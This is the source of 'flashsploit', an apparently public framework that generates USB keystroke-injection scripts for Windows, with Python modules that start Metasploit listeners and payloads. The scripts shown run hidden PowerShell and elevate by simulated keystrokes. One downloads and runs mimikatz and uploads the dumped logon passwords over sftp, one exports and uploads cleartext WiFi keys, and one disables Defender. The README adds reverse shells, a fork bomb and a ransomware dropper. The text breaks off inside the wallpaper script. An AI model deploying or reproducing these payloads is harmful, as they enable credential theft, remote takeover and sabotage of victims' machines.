├── README.md
├── conf
├── exfil_scripts.json
├── misc_scripts.json
├── rshell_scripts.json
└── sftp.conf
├── flashsploit.py
├── modules
├── __init__.py
├── exfil.py
├── misc.py
├── reverse_shell.py
└── sftp.py
├── output
└── empty.txt
└── scripts
└── windows
├── exfil
├── mimikatz.ino
├── netinfo.ino
└── wifi_key_grabber.ino
├── misc
├── anti_defender.ino
├── change_wallpaper.ino
├── dropper.ino
└── fork_bomb.ino
└── reverse_shell
├── certutil_reverse_shell.ino
├── cscript_reverse_shell.ino
├── hta_reverse_shell.ino
├── msiexec_reverse_shell.ino
└── regsvr32_reverse_shell.ino
/README.md:
--------------------------------------------------------------------------------
1 | 
2 |
3 | Exploitation Framework for ATtiny85 HID Attacks
4 |
5 |
6 | 
7 | 
8 | 
9 |
10 |
11 |
12 | Twitter
13 | -
14 | Telegram
15 | -
16 | Blog
17 |
18 |
19 |
20 |
21 | Available in
22 |
23 | 
24 |
25 |
26 | Flashsploit is an Exploitation Framework for Attacks using ATtiny85 HID Devices such as Digispark USB Development Board, flashsploit generates Arduino IDE Compatible (.ino) Scripts based on User Input and then Starts a Listener in Metasploit-Framework if Required by the Script, in Summary : Automatic Script Generation with Automated msfconsole.
27 |
28 |
29 | 
30 |
31 |
32 | ## Features
33 |
34 | * TODO : Add Linux and OSX Scripts
35 |
36 | ### Windows
37 |
38 | #### Data Exfiltration
39 |
40 | * Extract all WiFi Passwords and Uploads an XML to SFTP Server | YouTube :
41 |
42 | [](https://www.youtube.com/watch?v=N8vR69Qqz60)
43 |
44 | * Extract Network Configuration Information of Target System and Uploads to SFTP Server | YouTube :
45 |
46 | [](https://www.youtube.com/watch?v=I2loDe3Kqaw)
47 |
48 |
49 | * Extract Passwords and Other Critical Information using Mimikatz and Uploads to SFTP Server | YouTube :
50 |
51 | [](https://www.youtube.com/watch?v=puxPviIoITo)
52 |
53 | #### Reverse Shells
54 |
55 | * Get Reverse Shell by Abusing Microsoft HTML Apps (mshta) | YouTube :
56 |
57 | [](https://www.youtube.com/watch?v=4DsEMGsZB94)
58 |
59 |
60 | * Get Reverse Shell by Abusing Certification Authority Utility (certutil)
61 | * Get Reverse Shell by Abusing Windows Script Host (csript)
62 | * Get Reverse Shell by Abusing Windows Installer (msiexec)
63 | * Get Reverse Shell by Abusing Microsoft Register Server Utility (regsvr32)
64 |
65 | #### Miscellaneous
66 |
67 | * Change Wallpaper of Target Machine | YouTube :
68 |
69 | [](https://www.youtube.com/watch?v=pBz3fG2S8f4)
70 |
71 | * Make Windows Unresponsive using a .bat Script (100% CPU and RAM usage)
72 |
73 | [](https://www.youtube.com/watch?v=nCLVaGsIQOE)
74 |
75 | * Drop and Execute a File of your Choice, a ransomware maybe? ;)
76 | * Disable Windows Defender Service on Target Machine
77 |
78 | [](https://www.youtube.com/watch?v=1tSQ7A5obHk)
79 |
80 | ## Tested on
81 |
82 | * Kali Linux 2019.2
83 | * BlackArch Linux
84 |
85 | ## Dependencies
86 |
87 | Flashsploit Depends upon 4 Packages which are Generally Pre-installed in Major Pentest OS :
88 |
89 | * Metasploit-Framework
90 | * Python 3
91 | * SFTP
92 | * PHP
93 |
94 | If you think I should still make an Install Script, Open an issue.
95 |
96 | ## Installation / Usage
97 |
98 | #### BlackArch Linux
99 |
100 | ```bash
101 | pacman -S flashsploit
102 | ```
103 |
104 | #### Kali Linux
105 |
106 | ```bash
107 | git clone https://github.com/thewhiteh4t/flashsploit.git
108 | cd flashsploit
109 | python3 flashsploit.py
110 | ```
--------------------------------------------------------------------------------
/conf/exfil_scripts.json:
--------------------------------------------------------------------------------
1 | {
2 | "wifi_key_grabber": {
3 | "desc": "Extracts All WiFi Passwords and Uploads xml to your SFTP Server",
4 | "sftp": 1,
5 | "msf": 0
6 | },
7 | "netinfo": {
8 | "desc": "Extracts Network Configuration Information of Target System and Uploads to your SFTP Server",
9 | "sftp": 1,
10 | "msf": 0
11 | },
12 | "mimikatz": {
13 | "desc": "Extracts Passwords and Other Critical Information using Mimikatz and Uploads to your SFTP Server",
14 | "sftp": 1,
15 | "msf": 0
16 | }
17 | }
--------------------------------------------------------------------------------
/conf/misc_scripts.json:
--------------------------------------------------------------------------------
1 | {
2 | "change_wallpaper": {
3 | "desc": "Changes Wallpaper of Target Machine",
4 | "url": 1,
5 | "server": 0
6 | },
7 | "fork_bomb": {
8 | "desc": "Make Windows Unresponsive using a .bat Script ( 100% CPU and RAM Usage )",
9 | "url": 0,
10 | "server": 0
11 | },
12 | "dropper": {
13 | "desc": "Drop and Execute a File of your Choice, ransomware maybe... ;)",
14 | "url": 0,
15 | "server": 1
16 | },
17 | "anti_defender": {
18 | "desc": "Disables Windows Defender Service on Target Machine",
19 | "url": 0,
20 | "server": 0
21 | }
22 | }
--------------------------------------------------------------------------------
/conf/rshell_scripts.json:
--------------------------------------------------------------------------------
1 | {
2 | "hta": {
3 | "desc": "Get Reverse Shell by Abusing Microsoft HTML Apps (mshta)",
4 | "sftp": 0,
5 | "msf": 1,
6 | "module": "exploit/windows/misc/hta_server",
7 | "srv": 1,
8 | "target": "0"
9 | },
10 | "certutil": {
11 | "desc": "Get Reverse Shell by Abusing Certification Authority Utility (certutil)",
12 | "sftp": 0,
13 | "module": "exploit/multi/handler",
14 | "msf": 1,
15 | "srv": 0,
16 | "target": "0"
17 | },
18 | "cscript": {
19 | "desc": "Get Reverse Shell by Abusing Windows Script Host (csript)",
20 | "sftp": 0,
21 | "module": "exploit/multi/handler",
22 | "msf": 1,
23 | "srv": 0,
24 | "target": "0"
25 | },
26 | "msiexec": {
27 | "desc": "Get Reverse Shell by Abusing Windows Installer (msiexec)",
28 | "sftp": 0,
29 | "module": "exploit/multi/handler",
30 | "msf": 1,
31 | "srv": 0,
32 | "target": "0"
33 | },
34 | "regsvr": {
35 | "desc": "Get Reverse Shell by Abusing Microsoft Register Server Utility (regsvr32)",
36 | "sftp": 0,
37 | "module": "exploit/multi/script/web_delivery",
38 | "msf": 1,
39 | "srv": 1,
40 | "target": "3"
41 | }
42 | }
43 |
--------------------------------------------------------------------------------
/conf/sftp.conf:
--------------------------------------------------------------------------------
1 | username:password
2 |
--------------------------------------------------------------------------------
/flashsploit.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | import os
4 | import subprocess as subp
5 | from modules.misc import misc
6 | from modules.exfil import exfil
7 | from modules.reverse_shell import rshell
8 |
9 | R = '\033[31m' # red
10 | G = '\033[32m' # green
11 | C = '\033[36m' # cyan
12 | W = '\033[0m' # white
13 |
14 | version = '1.0.0'
15 |
16 | def banner():
17 | os.system('clear')
18 | banner = r'''
19 | ______ __ __ _ __
20 | / __/ /___ ______/ /_ _________ / /___ (_) /_
21 | / /_/ / __ `/ ___/ __ \/ ___/ __ \/ / __ \/ / __/
22 | / __/ / /_/ (__ ) / / (__ ) /_/ / / /_/ / / /_
23 | /_/ /_/\__,_/____/_/ /_/____/ .___/_/\____/_/\__/
24 | /_/
25 | '''
26 | print(G + banner + W)
27 | print(G + '[+]' + C + ' Created By : ' + W + 'thewhiteh4t')
28 | print(G + '[+]' + C + ' Version : ' + W + version)
29 |
30 | def main():
31 | print('\n' + G + '[+]' + C + ' Choose Target : ' + W + '\n')
32 | print(G + '[1]' + C + ' Windows' + W)
33 | while True:
34 | choice = input(G + '\nfs > ' + W)
35 |
36 | if choice == '1':
37 | win()
38 | elif choice == 'exit' or choice == 'quit':
39 | quit()
40 | else:
41 | print('\n' + R + '[-]' + C + ' Invalid Input...' + W)
42 | pass
43 |
44 | def win():
45 | print('\n', end='')
46 | print(G + '[1]' + C + ' exfil' + W)
47 | print(G + '[2]' + C + ' reverse_shell' + W)
48 | print(G + '[3]' + C + ' misc' + W)
49 |
50 | while True:
51 | win_choice = input(G + '\nfs[windows] > ' + W)
52 |
53 | if win_choice == '1':
54 | exfil(win)
55 | elif win_choice == '2':
56 | rshell(win)
57 | elif win_choice == '3':
58 | misc(win)
59 | elif win_choice == 'clear':
60 | os.system('clear')
61 | elif win_choice == 'back':
62 | return main()
63 | elif win_choice == 'help':
64 | return win()
65 | elif win_choice == '':
66 | pass
67 | elif win_choice == 'exit' or win_choice == 'quit':
68 | quit()
69 | else:
70 | print('\n' + R + '[-]' + C + ' Invalid Input...' + W)
71 | pass
72 |
73 | def quit():
74 | distro = subp.Popen(['uname', '-r'], stdout = subp.PIPE)
75 | distro = distro.communicate()[0].decode()
76 | if 'ARCH' in distro:
77 | subp.call(['systemctl', 'stop', 'sshd.service'])
78 | else:
79 | subp.call(['systemctl', 'stop', 'ssh.service'])
80 | subp.call(['pkill', 'php'])
81 | exit()
82 |
83 | try:
84 | banner()
85 | main()
86 | except KeyboardInterrupt:
87 | print(R + '[-]' + C + ' Keyboard Interrupt.' + W + '\n')
88 | quit()
89 |
--------------------------------------------------------------------------------
/modules/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thewhiteh4t/flashsploit/c465a6dac5af564d4f0754e0bd8eea88bce03ca4/modules/__init__.py
--------------------------------------------------------------------------------
/modules/exfil.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | import os
4 | import json
5 | from modules.sftp import sftp
6 |
7 | R = '\033[31m' # red
8 | G = '\033[32m' # green
9 | C = '\033[36m' # cyan
10 | W = '\033[0m' # white
11 |
12 | def exfil(win):
13 | print('\n', end='')
14 | exfil_scripts = []
15 | for (dirpath, dirname, filenames) in os.walk('scripts/windows/exfil'):
16 | exfil_scripts.extend(filenames)
17 | for item in exfil_scripts:
18 | print(G + '[{}] '.format(exfil_scripts.index(item)) + C + item)
19 |
20 | while True:
21 | exfil_choice = input(G + '\nfs[windows/exfil] > ' + W)
22 |
23 | if exfil_choice == 'clear':
24 | os.system('clear')
25 | elif exfil_choice == 'back':
26 | return win()
27 | elif exfil_choice == 'help':
28 | return exfil(win)
29 | elif exfil_choice == '':
30 | pass
31 | elif exfil_choice == 'exit' or exfil_choice == 'quit':
32 | quit()
33 | elif int(exfil_choice) <= len(exfil_scripts) - 1:
34 | with open('conf/exfil_scripts.json', 'r') as json_file:
35 | options = json.load(json_file)
36 | try:
37 | chosen = exfil_scripts[int(exfil_choice)]
38 |
39 | for k,v in options.items():
40 | if k in chosen:
41 | sftp_state = v['sftp']
42 | msf_state = v['msf']
43 | desc = v['desc']
44 | print('\n', end = '')
45 | print(G + '[+]' + C + ' Script : ' + W + chosen + '\n')
46 | print(G + '[+]' + C + ' Info : ' + W + desc + '\n')
47 | if sftp_state == 1:
48 | sftp()
49 | else:
50 | pass
51 | if msf_state == 1:
52 | msf()
53 | else:
54 | pass
55 | script_path = '/scripts/windows/exfil/' + chosen
56 | exfil_output(script_path, chosen)
57 | except ValueError:
58 | pass
59 | else:
60 | print('\n' + R + '[-]' + C + ' Invalid Input...' + W)
61 | pass
62 |
63 | def exfil_output(script_path, chosen):
64 | base_path = os.getcwd() + script_path
65 |
66 | with open(base_path, 'r') as file :
67 | filedata = file.read()
68 |
69 | filedata = filedata.replace('USERNAME', sftp.sftp_user)
70 | filedata = filedata.replace('PASSWORD', sftp.sftp_pass)
71 | filedata = filedata.replace('IPADDR', sftp.server_ip)
72 |
73 | with open('output/{}'.format(chosen), 'w') as file:
74 | file.write(filedata)
75 |
76 | outfile_path = os.getcwd() + '/output/{}'.format(chosen)
77 |
78 | print(G + '[+]' + C + ' Script Generated : ' + W + outfile_path)
--------------------------------------------------------------------------------
/modules/misc.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | import os
4 | import json
5 |
6 | R = '\033[31m' # red
7 | G = '\033[32m' # green
8 | C = '\033[36m' # cyan
9 | W = '\033[0m' # white
10 |
11 | def misc(win):
12 | print('\n', end='')
13 | misc_scripts = []
14 | for (dirpath, dirname, filenames) in os.walk('scripts/windows/misc'):
15 | misc_scripts.extend(filenames)
16 | for item in misc_scripts:
17 | print(G + '[{}] '.format(misc_scripts.index(item)) + W + item)
18 |
19 | while True:
20 | try:
21 | misc_choice = input(G + '\nfs[windows/misc] > ' + W)
22 |
23 | if misc_choice == 'clear':
24 | os.system('clear')
25 | elif misc_choice == 'back':
26 | return win()
27 | elif misc_choice == 'help':
28 | return misc(win)
29 | elif misc_choice == '':
30 | pass
31 | elif misc_choice == 'exit' or misc_choice == 'quit':
32 | quit()
33 | elif int(misc_choice) <= len(misc_scripts) - 1:
34 | with open('conf/misc_scripts.json', 'r') as json_file:
35 | options = json.load(json_file)
36 | chosen = misc_scripts[int(misc_choice)]
37 |
38 | for k,v in options.items():
39 | if k in chosen:
40 | desc = v['desc']
41 | url_state = v['url']
42 | server_state = v['server']
43 | print('\n', end = '')
44 | print(G + '[+]' + C + ' Script : ' + W + chosen + '\n')
45 | print(G + '[+]' + C + ' Info : ' + W + desc + '\n')
46 | if url_state == 1:
47 | misc.misc_url = input(G + '[+]' + C + ' URL : ' + W)
48 | else:
49 | pass
50 | if server_state == 1:
51 | misc.misc_host = input(G + '[+]' + C + ' Server Host : ' + W)
52 | misc.misc_port = input(G + '[+]' + C + ' Server Port : ' + W)
53 | misc.misc_fname = input(G + '[+]' + C + ' Filename (with extension) : ' + W)
54 | script_path = '/scripts/windows/misc/' + chosen
55 | misc_output(script_path, chosen, url_state, server_state)
56 | else:
57 | print('\n' + R + '[-]' + C + ' Invalid Input...' + W)
58 | pass
59 | except ValueError:
60 | print('\n' + R + '[-]' + C + ' Invalid Input...' + W)
61 | pass
62 |
63 | def misc_output(script_path, chosen, url_state, server_state):
64 | base_path = os.getcwd() + script_path
65 | outfile_path = os.getcwd() + '/output/{}'.format(chosen)
66 |
67 | if url_state == 1:
68 | with open(base_path, 'r') as file :
69 | filedata = file.read()
70 |
71 | filedata = filedata.replace('URL', misc.misc_url)
72 |
73 | with open('output/{}'.format(chosen), 'w') as file:
74 | file.write(filedata)
75 | else:
76 | os.system('cp {} {}'.format(base_path, outfile_path))
77 |
78 | if server_state == 1:
79 | with open(base_path, 'r') as file :
80 | filedata = file.read()
81 |
82 | filedata = filedata.replace('HOST', misc.misc_host)
83 | filedata = filedata.replace('PORT', misc.misc_port)
84 | filedata = filedata.replace('FILENAME', misc.misc_fname)
85 |
86 | with open('output/{}'.format(chosen), 'w') as file:
87 | file.write(filedata)
88 |
89 | print(G + '[+]' + C + ' Script Generated : ' + W + outfile_path)
--------------------------------------------------------------------------------
/modules/reverse_shell.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | import os
4 | import json
5 | import subprocess as subp
6 | from modules.sftp import sftp
7 | R = '\033[31m' # red
8 | G = '\033[32m' # green
9 | C = '\033[36m' # cyan
10 | W = '\033[0m' # white
11 |
12 | def rshell(win):
13 | print('\n', end='')
14 | rs_scripts = []
15 | for (dirpath, dirname, filenames) in os.walk('scripts/windows/reverse_shell'):
16 | rs_scripts.extend(filenames)
17 | for item in rs_scripts:
18 | print(G + '[{}] '.format(rs_scripts.index(item)) + C + item)
19 |
20 | while True:
21 | try:
22 | rshell_choice = input(G + '\nfs[windows/reverse_shell] > ' + W)
23 |
24 | if rshell_choice == 'clear':
25 | os.system('clear')
26 | elif rshell_choice == 'back':
27 | return win()
28 | elif rshell_choice == 'help':
29 | return rshell(win)
30 | elif rshell_choice == '':
31 | pass
32 | elif rshell_choice == 'exit' or rshell_choice == 'quit':
33 | quit()
34 | elif int(rshell_choice) <= len(rs_scripts) - 1:
35 | with open('conf/rshell_scripts.json', 'r') as json_file:
36 | options = json.load(json_file)
37 |
38 | rshell.chosen = rs_scripts[int(rshell_choice)]
39 |
40 | for k,v in options.items():
41 | if k in rshell.chosen:
42 | try:
43 | sftp_state = v['sftp']
44 | msf_state = v['msf']
45 | desc = v['desc']
46 | rshell.module = v['module']
47 | rshell.srv_state = v['srv']
48 | rshell.target = v['target']
49 | except KeyError:
50 | pass
51 |
52 | print('\n', end = '')
53 | print(G + '[+]' + C + ' Script : ' + W + rshell.chosen + '\n')
54 | print(G + '[+]' + C + ' Info : ' + W + desc + '\n')
55 |
56 | if sftp_state == 1:
57 | sftp()
58 | else:
59 | pass
60 |
61 | if msf_state == 1:
62 | print(G + '[+]' + C + ' Module : ' + W + rshell.module + '\n')
63 | rshell.payload = input(G + '[+]' + C + ' Payload : ' + W)
64 | rshell.lhost = input(G + '[+]' + C + ' LHOST : ' + W)
65 | rshell.lport = input(G + '[+]' + C + ' LPORT : ' + W)
66 | else:
67 | pass
68 |
69 | if rshell.srv_state == 1:
70 | rshell.srvhost = input(G + '[+]' + C + ' SRVHOST : ' + W)
71 | rshell.srvport = input(G + '[+]' + C + ' SRVPORT : ' + W)
72 | else:
73 | rshell.php_port = input(G + '[+]' + C + ' PHP Server Port : ' + W)
74 | print(G + '[+]' + C + ' Starting PHP Server...' + W)
75 | subp.Popen(['php', '-S', '0.0.0.0:{}'.format(rshell.php_port)], stdout=subp.PIPE)
76 |
77 | rshell.filename = input(G + '[+]' + C + ' Filename (Without Extension) : ' + W)
78 | rshell.script_path = '/scripts/windows/reverse_shell/' + rshell.chosen
79 | rshell_output()
80 | msf()
81 | else:
82 | print('\n' + R + '[-]' + C + ' Invalid Input...' + W)
83 | pass
84 | except ValueError:
85 | print('\n' + R + '[-]' + C + ' Invalid Input...' + W)
86 | pass
87 |
88 | def rshell_output():
89 | base_path = os.getcwd() + rshell.script_path
90 |
91 | with open(base_path, 'r') as file :
92 | filedata = file.read()
93 |
94 | if rshell.srv_state == 1:
95 | filedata = filedata.replace('SRVHOST', rshell.srvhost)
96 | filedata = filedata.replace('SRVPORT', rshell.srvport)
97 | else:
98 | filedata = filedata.replace('LHOST', rshell.lhost)
99 | filedata = filedata.replace('PHPPORT', rshell.php_port)
100 |
101 | filedata = filedata.replace('FILENAME', rshell.filename)
102 |
103 | with open('output/{}'.format(rshell.chosen), 'w') as file:
104 | file.write(filedata)
105 |
106 | outfile_path = os.getcwd() + '/output/{}'.format(rshell.chosen)
107 |
108 | print(G + '[+]' + C + ' Script Generated : ' + W + outfile_path)
109 |
110 | def msf():
111 | msf_choice = input(G + '[+]' + C + ' Start Metasploit Framework [y/n]: ' + W)
112 | if msf_choice == 'y':
113 | print('\n', end='')
114 | if rshell.srv_state == 1:
115 | subp.call(['msfconsole', '-q', '-x', 'use {}; \
116 | set payload {}; \
117 | set LHOST {}; \
118 | set LPORT {}; \
119 | set target {}; \
120 | set SRVHOST {}; \
121 | set SRVPORT {}; \
122 | set URIPATH {}; \
123 | exploit -j'.format(rshell.module, rshell.payload, rshell.lhost, rshell.lport, rshell.target, rshell.srvhost, rshell.srvport, rshell.filename)])
124 |
125 | else:
126 | print(G + '[+]' + C + ' Generating Payload...' + W + '\n')
127 | subp.call(['msfvenom',
128 | '-p', '{}'.format(rshell.payload),
129 | 'LHOST={}'.format(rshell.lhost),
130 | 'LPORT={}'.format(rshell.lport),
131 | '-f', 'exe',
132 | '-o', '{}.exe'.format(rshell.filename)])
133 |
134 | subp.call(['msfconsole', '-q', '-x', 'use {}; \
135 | set payload {}; \
136 | set LHOST {}; \
137 | set LPORT {}; \
138 | set target {}; \
139 | exploit -j'.format(rshell.module, rshell.payload, rshell.lhost, rshell.lport, rshell.target)])
140 |
141 | elif msf_choice == 'n':
142 | pass
143 | else:
144 | pass
--------------------------------------------------------------------------------
/modules/sftp.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | import os
4 | import json
5 | import subprocess as subp
6 |
7 | R = '\033[31m' # red
8 | G = '\033[32m' # green
9 | C = '\033[36m' # cyan
10 | W = '\033[0m' # white
11 |
12 | def sftp():
13 | sftp_conf_path = os.getcwd() + '/conf/sftp.conf'
14 |
15 | sftp.server_ip = input(G + '[+]' + C + ' SFTP Server IP : ' + W)
16 |
17 | print(G + '[+]' + C + ' Reading SFTP Credentials from ' + W + sftp_conf_path)
18 |
19 | with open(sftp_conf_path) as sftp_conf:
20 | reader = sftp_conf.read()
21 | reader = reader.split(':')
22 | sftp.sftp_user = reader[0].strip()
23 | sftp.sftp_pass = reader[1].strip()
24 |
25 | print(G + '[+]' + C + ' Starting SFTP Server...' + W)
26 | distro = subp.Popen(['uname', '-r'], stdout = subp.PIPE)
27 | distro = distro.communicate()[0].decode()
28 | if 'ARCH' in distro:
29 | subp.call(['systemctl', 'start', 'sshd.service'])
30 | else:
31 | subp.call(['systemctl', 'start', 'ssh.service'])
--------------------------------------------------------------------------------
/output/empty.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thewhiteh4t/flashsploit/c465a6dac5af564d4f0754e0bd8eea88bce03ca4/output/empty.txt
--------------------------------------------------------------------------------
/scripts/windows/exfil/mimikatz.ino:
--------------------------------------------------------------------------------
1 | // Author : thewhiteh4t //
2 | #include "DigiKeyboard.h"
3 | void setup() {
4 | pinMode(1, OUTPUT);
5 | }
6 | void loop() {
7 | DigiKeyboard.delay(5000);
8 | DigiKeyboard.sendKeyStroke(0);
9 | DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
10 | DigiKeyboard.delay(300);
11 | DigiKeyboard.print("powershell -windowstyle hidden");
12 | DigiKeyboard.sendKeyStroke(KEY_ENTER, MOD_CONTROL_LEFT + MOD_SHIFT_LEFT);
13 | DigiKeyboard.delay(500);
14 | DigiKeyboard.sendKeyStroke(KEY_ARROW_LEFT);
15 | DigiKeyboard.delay(100);
16 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
17 | DigiKeyboard.delay(1000);
18 | DigiKeyboard.print("cd $env:temp");
19 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
20 | DigiKeyboard.print("(new-object System.Net.WebClient).DownloadFile('http://IPADDR/mimikatz.exe',\"$env:temp/mimikatz.exe\")");
21 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
22 | DigiKeyboard.delay(5000);
23 | DigiKeyboard.print(".\\mimikatz.exe");
24 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
25 | DigiKeyboard.delay(300);
26 | DigiKeyboard.print("log");
27 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
28 | DigiKeyboard.delay(300);
29 | DigiKeyboard.print("privilege::debug");
30 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
31 | DigiKeyboard.delay(300);
32 | DigiKeyboard.print("sekurlsa::logonPasswords full");
33 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
34 | DigiKeyboard.delay(1000);
35 | DigiKeyboard.print("exit");
36 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
37 | DigiKeyboard.print("sftp USERNAME@IPADDR");
38 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
39 | DigiKeyboard.delay(1200);
40 | DigiKeyboard.print("PASSWORD");
41 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
42 | DigiKeyboard.delay(500);
43 | DigiKeyboard.print("mput mimikatz.log");
44 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
45 | DigiKeyboard.delay(1000);
46 | DigiKeyboard.print("bye");
47 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
48 | DigiKeyboard.print("rm mimikatz.exe, mimikatz.log");
49 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
50 | DigiKeyboard.print("exit");
51 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
52 | digitalWrite(1, HIGH);
53 | DigiKeyboard.delay(90000);
54 | digitalWrite(1, LOW);
55 | DigiKeyboard.delay(5000);
56 | }
57 |
--------------------------------------------------------------------------------
/scripts/windows/exfil/netinfo.ino:
--------------------------------------------------------------------------------
1 | // Author : thewhiteh4t //
2 | #include "DigiKeyboard.h"
3 | void setup() {
4 | pinMode(1, OUTPUT);
5 | }
6 | void loop() {
7 | DigiKeyboard.delay(5000);
8 | DigiKeyboard.sendKeyStroke(0);
9 | DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
10 | DigiKeyboard.delay(300);
11 | DigiKeyboard.print("powershell -windowstyle hidden");
12 | DigiKeyboard.sendKeyStroke(KEY_ENTER, MOD_CONTROL_LEFT + MOD_SHIFT_LEFT);
13 | DigiKeyboard.delay(500);
14 | DigiKeyboard.sendKeyStroke(KEY_ARROW_LEFT);
15 | DigiKeyboard.delay(100);
16 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
17 | DigiKeyboard.delay(1000);
18 | DigiKeyboard.print("cd $env:temp");
19 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
20 | DigiKeyboard.print("$cmd = {hostname; Get-NetIpaddress | Where PrefixOrigin -EQ DHCP}");
21 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
22 | DigiKeyboard.delay(100);
23 | DigiKeyboard.print("$cmd.InvokeReturnAsIs() | Out-File $env:temp/netinfo.txt -Append");
24 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
25 | DigiKeyboard.delay(1000);
26 | DigiKeyboard.print("sftp USERNAME@IPADDR");
27 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
28 | DigiKeyboard.delay(1200);
29 | DigiKeyboard.print("yes");
30 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
31 | DigiKeyboard.delay(5000);
32 | DigiKeyboard.print("PASSWORD");
33 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
34 | DigiKeyboard.delay(500);
35 | DigiKeyboard.print("mput netinfo.txt");
36 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
37 | DigiKeyboard.delay(1000);
38 | DigiKeyboard.print("bye");
39 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
40 | DigiKeyboard.print("rm netinfo.txt");
41 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
42 | DigiKeyboard.print("exit");
43 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
44 | digitalWrite(1, HIGH);
45 | DigiKeyboard.delay(90000);
46 | digitalWrite(1, LOW);
47 | DigiKeyboard.delay(5000);
48 | }
49 |
--------------------------------------------------------------------------------
/scripts/windows/exfil/wifi_key_grabber.ino:
--------------------------------------------------------------------------------
1 | // Author : thehwiteh4t //
2 | #include "DigiKeyboard.h"
3 | void setup() {
4 | pinMode(1, OUTPUT);
5 | #define KEY_ARROW_DOWN 0x51
6 | }
7 | void loop() {
8 | DigiKeyboard.delay(2000);
9 | DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
10 | DigiKeyboard.delay(100);
11 | DigiKeyboard.print("cmd");
12 | DigiKeyboard.sendKeyStroke(KEY_ENTER, MOD_CONTROL_LEFT + MOD_SHIFT_LEFT);
13 | DigiKeyboard.delay(500);
14 | DigiKeyboard.sendKeyStroke(KEY_ARROW_LEFT);
15 | DigiKeyboard.delay(100);
16 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
17 | DigiKeyboard.delay(1000);
18 | DigiKeyboard.sendKeyStroke(KEY_SPACE, MOD_ALT_LEFT);
19 | DigiKeyboard.sendKeyStroke(KEY_M);
20 | int i;
21 | for(i=1;i<100;i++) {
22 | DigiKeyboard.sendKeyStroke(KEY_ARROW_DOWN);
23 | }
24 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
25 | DigiKeyboard.delay(1000);
26 | DigiKeyboard.print("cd %temp%");
27 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
28 | DigiKeyboard.print("@netsh wlan export profile key=clear >nul");
29 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
30 | DigiKeyboard.print("sftp USERNAME@IPADDR");
31 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
32 | DigiKeyboard.delay(1000);
33 | DigiKeyboard.print("yes");
34 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
35 | DigiKeyboard.delay(5000);
36 | DigiKeyboard.print("PASSWORD");
37 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
38 | DigiKeyboard.delay(500);
39 | DigiKeyboard.print("mput *.xml");
40 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
41 | DigiKeyboard.delay(1000);
42 | DigiKeyboard.print("bye");
43 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
44 | DigiKeyboard.delay(200);
45 | DigiKeyboard.print("del /f /q /s *.xml >nul");
46 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
47 | DigiKeyboard.print("exit");
48 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
49 | digitalWrite(1, HIGH);
50 | DigiKeyboard.delay(90000);
51 | digitalWrite(1, LOW);
52 | DigiKeyboard.delay(5000);
53 | }
54 |
--------------------------------------------------------------------------------
/scripts/windows/misc/anti_defender.ino:
--------------------------------------------------------------------------------
1 | #include "DigiKeyboard.h"
2 | void setup() {
3 | pinMode(1, OUTPUT);
4 | }
5 | void loop() {
6 | DigiKeyboard.delay(5000);
7 | DigiKeyboard.sendKeyStroke(0);
8 | DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
9 | DigiKeyboard.delay(300);
10 | DigiKeyboard.print("powershell -windowstyle hidden");
11 | DigiKeyboard.sendKeyStroke(KEY_ENTER, MOD_CONTROL_LEFT + MOD_SHIFT_LEFT);
12 | DigiKeyboard.delay(1000);
13 | DigiKeyboard.sendKeyStroke(KEY_ARROW_LEFT);
14 | DigiKeyboard.delay(100);
15 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
16 | DigiKeyboard.delay(1000);
17 | DigiKeyboard.print("Set-MpPreference -DisableRealtimeMonitoring $true");
18 | DigiKeyboard.sendKeyStroke(KEY_ENTER);
19 | digitalWrite(1, HIGH);
20 | DigiKeyboard.delay(90000);
21 | digitalWrite(1, LOW);
22 | DigiKeyboard.delay(5000);
23 | }
24 |
--------------------------------------------------------------------------------
/scripts/windows/misc/change_wallpaper.ino:
--------------------------------------------------------------------------------
1 | // Author : thewhiteh4t //
2 | #include "DigiKeyboard.h"
